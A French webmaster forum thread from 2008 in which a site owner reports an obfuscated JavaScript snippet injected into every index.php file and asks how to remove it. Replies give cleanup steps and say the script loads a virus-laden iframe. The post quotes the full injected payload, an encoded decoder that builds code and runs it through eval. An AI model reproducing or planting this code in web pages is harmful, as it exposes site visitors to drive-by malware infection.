moonwar Posté 17 Novembre 2008 Partager Posté 17 Novembre 2008 Salitation, Ca fait un bon moment, j'ai remarqué un code qui s'ajoute a tout mes fichiers index.php. Je ne connais ni l'origine ni la raison. J'ai aussi remarqué que ce code vient juste après la balise <body> ou juste avant la balise </body> <script language=JavaScript> function jbnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,30,39,22,1,14,38,60,18,9,0,0,0,0,0,0,58,48,35,28,33,55,56,41,23,6,37,3,45,46,42,24,12,47,17,15,57,54,31,40,20,19,25,0,0,0,0,0,0,4,16,32,52,7,10,11,61,59,8,43,44,51,5,2,34,29,62,36,13,50,27,26,21,53,49);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(208^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}jbnb25('26kQdriGrSfGz8wGBUrhXrkQy10_AT_drilJUvLr8N02fwMs3grEm1MUfwlh3g7rIvQyU5_AT_2Y1LASNWmUM7F8fGcNr00V1ld8vMs6iQr_AT_VMrwiQ0Y_AT_0QV0rqIgGF_AT_QW03NQdpV2z8fMrgwlr8iQhpVr_AT_YMTJHMTTQ0hWV5Ty10rEgS726gLspvisHMFABvLT1gMsU1FcS57B8wN73viuYvMBofQz6N_AT_rrkQyfQil0VMUfwlh3kiE2S') </script> Comment s'en debarasser et est-ce-que vous avez une idée sur la faille sécuritaire que ce code utilise. Merci pour votre aide. Lien vers le commentaire Partager sur d’autres sites More sharing options...
f_trt Posté 17 Novembre 2008 Partager Posté 17 Novembre 2008 Ce code est ajouté à la volée par ton hebergeur ? pour savoir le code est-il présent si tu recupère le source via ftp ? En attendant deux précautions à prendre : 1/ Effectuer une sauvegarde complète de ton hebergement (pour recherche du problème plus tard) 2/ S'assurer que ta machine (celle qui te sert à télécharger ton site) est propre passe un anti-virus récent + un anti spy 3/ Une fois que tu es sûre que ta machine est propre change ton mot de passe ftp de ton hebergement 4/ Laisse le minimum sur le serveur quitte à tout effacer et retélécharger depuis ton pc propre Maintenant que tout doit être ok il te faut trouver ce qui se passe ou s'est passé 6/ Tu étudies les log serveur pour mettre le doigt sur des scripts suspect ou des appels de page bizarre 7/ Tu rapproche ton log de ce que tu as sauvegarder pour trouver le problème A+ Lien vers le commentaire Partager sur d’autres sites More sharing options...
captain_torche Posté 17 Novembre 2008 Partager Posté 17 Novembre 2008 Si j'en crois ce sujet, le JavaScript ainsi inséré affiche une iframe vers une page contenant un virus; il est donc indispensable que tu t'en débarrasses au plus vite. Lien vers le commentaire Partager sur d’autres sites More sharing options...
Sujets conseillés
Veuillez vous connecter pour commenter
Vous pourrez laisser un commentaire après vous êtes connecté.
Connectez-vous maintenant